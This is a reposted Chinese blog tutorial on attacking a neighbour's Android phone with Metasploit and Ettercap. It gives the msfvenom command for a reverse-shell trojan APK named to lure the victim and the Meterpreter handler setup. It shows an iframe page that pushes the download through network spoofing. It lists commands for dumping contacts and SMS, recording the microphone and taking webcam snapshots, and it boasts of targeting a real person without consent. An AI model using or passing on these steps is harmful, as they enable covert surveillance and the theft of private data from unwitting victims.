Msf+Ettercap入侵邻居安卓手机【转】

首先启动msf

先用kali生成一个安卓木马,如下命令:
 
[AppleScript] 纯文本查看 复制代码
1
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk

 

 

为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
然后进入Msf
 
[AppleScript] 纯文本查看 复制代码
1
2
3
4
5
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.109 //ip为kaili的ip
set LPORT 44444 //端口一定要与前面生成的木马的端口一致
Exploit
 

 

下面我们开启ettercap -G
我物理IP
 

 

别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
下面我们来设置一下
 
 
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
 
 
 
下面我们开始攻击
 
大概过了5分钟多,发现反弹成功了
 
 
执行命令

 

[AppleScript] 纯文本查看 复制代码
1
2
3
4
5
6
7
dump_contacts    --》这个是导出电话
dump_sms                 --》这个是导出信息
record_mic     Record audio from the default microphone for X seconds
webcam_chat    Start a video chat
webcam_list    List webcams
webcam_snap    Take a snapshot from the specified webcam
webcam_stream  Play a video stream from the specified webcam

 

 
 
我们打开看一下电话薄
 
 
 
 
我们同时欺骗成DroidJack木马,使用方法如图:
 
 
 
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
 
 

 

此条目发表在未分类, 经验技术分类目录。将固定链接加入收藏夹。

发表评论